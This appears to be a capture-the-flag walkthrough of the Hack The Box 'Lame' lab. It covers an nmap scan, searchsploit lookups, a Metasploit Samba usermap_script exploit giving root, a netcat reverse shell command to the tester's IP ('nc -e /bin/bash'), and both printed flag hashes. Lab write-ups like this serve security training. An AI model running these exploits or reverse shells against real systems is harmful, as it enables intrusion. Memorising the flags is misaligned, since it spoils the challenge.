<- HTB

Lame


4 minutes to read

Lame
Hack The Box. Linux. Easy machine. This machine exposes vulnerable versions for FTP and SMB services. The SMB service is exploitable and derives in RCE as root
  • OS: Linux
  • Difficulty: Easy
  • IP Address: 10.10.10.3
  • Release: 14 / 03 / 2017

Port scanning

# Nmap 7.92 scan initiate as: nmap -sC -sV -Pn -o nmap/targeted 10.10.10.3 -p 21,22,139,445,3632  
Nmap scan report for 10.10.10.3
Host is up (0.064s latency).

PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.10.17.44
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name:
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time:
|_clock-skew: mean: 2h01m21s, deviation: 2h49m45s, median: 1m18s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done -- 1 IP address (1 host up) scanned in 52.51 seconds

This machine has ports 21 (FTP), 22 (SSH), 139, 445 (SMB) and 3632 open.

FTP enumeration

As stated by nmap we can access FTP with anonymous credentials:

$ ftp 10.10.10.3
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:rocky): anonymous
331 Please specify the password.
Password:
230 Login successful.
ftp> dir
200 PORT command successful. Consider using PASV.  
150 Here comes the directory listing.
226 Directory send OK.

But there’s nothing inside.

We can search for exploits for the version of FTP service (vsFTP 2.3.4) with searchsploit:

$ searchsploit vsftp 2.3.4
------------------------------------------------------- ----------------------  
Exploit Title                                          | Path
------------------------------------------------------- ----------------------
vsftpd 2.3.4 - Backdoor Command Execution              | unix/remote/49757.py
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | unix/remote/17491.rb
------------------------------------------------------- ----------------------
Shellcodes: No Results

Alright, it seems that we can get Remote Code Execution (RCE) for this version (CVE-2011-2523). If we inspect the exploit source code, it seems that there is a backdoor for user nergal:) that opens a bind shell on port 6200. However, it is not exploitable.

SMB enumeration

Let’s search for exploits the Samba 3.0.20 in searchsploit:

$ searchsploit Samba 3.0.20
--------------------------------------------------------------------------------- ---------------------------------  
Exploit Title                                                                    | Path
--------------------------------------------------------------------------------- ---------------------------------
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass                           | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit) | unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow                                            | linux/remote/7701.txt
Samba < 3.0.20 - Remote Heap Overflow                                            | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC)                                    | linux_x86/dos/36741.py
-------------------------------------------------------------------------------------------------------------------
Shellcodes: No Results

Alright, there is one that provides RCE.

Foothold on the machine

Let’s use Metasploit for this purpose:

# msfconsole -q
msf6 > search Samba 3.0.20

Matching Modules
================

   #  Name                                Disclosure Date  Rank       Check  Description
   -  ----                                ---------------  ----       -----  -----------
   0  exploit/multi/samba/usermap_script  2007-05-14       excellent  No     Samba "username map script" Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/samba/usermap_script

msf6 > use exploit/multi/samba/usermap_script
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit  
   RPORT   139              yes       The target port (TCP)


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.100    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(multi/samba/usermap_script) > set RHOSTS 10.10.10.3
RHOSTS => 10.10.10.3
msf6 exploit(multi/samba/usermap_script) > set LHOST 10.10.17.44
LHOST => 10.10.17.44
msf6 exploit(multi/samba/usermap_script) > exploit

[*] Started reverse TCP handler on 10.10.17.44:4444
[*] Command shell session 1 opened (10.10.17.44:4444 -> 10.10.10.3:40626) at 2022-07-17 18:24:10 +0200

which nc
/bin/nc
nc -e /bin/bash 10.10.17.44 5555

I decided to run a second reverse shell to get a full TTY in nc:

$ nc -nlvp 5555
Ncat: Version 7.92 ( https://nmap.org/ncat )  
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
Ncat: Connection from 10.10.10.3.
Ncat: Connection from 10.10.10.3:54564.
script /dev/null -c bash
root@lame:/# ^Z
zsh: suspended  ncat -nlvp 5555

$ stty raw -echo; fg
[1]  + continued  ncat -nlvp 5555

Erase set to delete.
Kill set to control-U (^U).
Interrupt set to control-C (^C).
root@lame:/# export TERM=xterm
root@lame:/# export SHELL=bash
root@lame:/# stty rows 50 columns 158

Privilege escalation

We are already root, so at this point, we must capture both flags:

root@lame:/# ls /home
ftp  makis  service  user
root@lame:/# find /home -name user.txt  
/home/makis/user.txt
root@lame:/# cat /home/makis/user.txt
56c5a638db443c0dd212990228c55aec
root@lame:/# cat /root/root.txt
490c7ed2a8c6e7a72d719d478938accc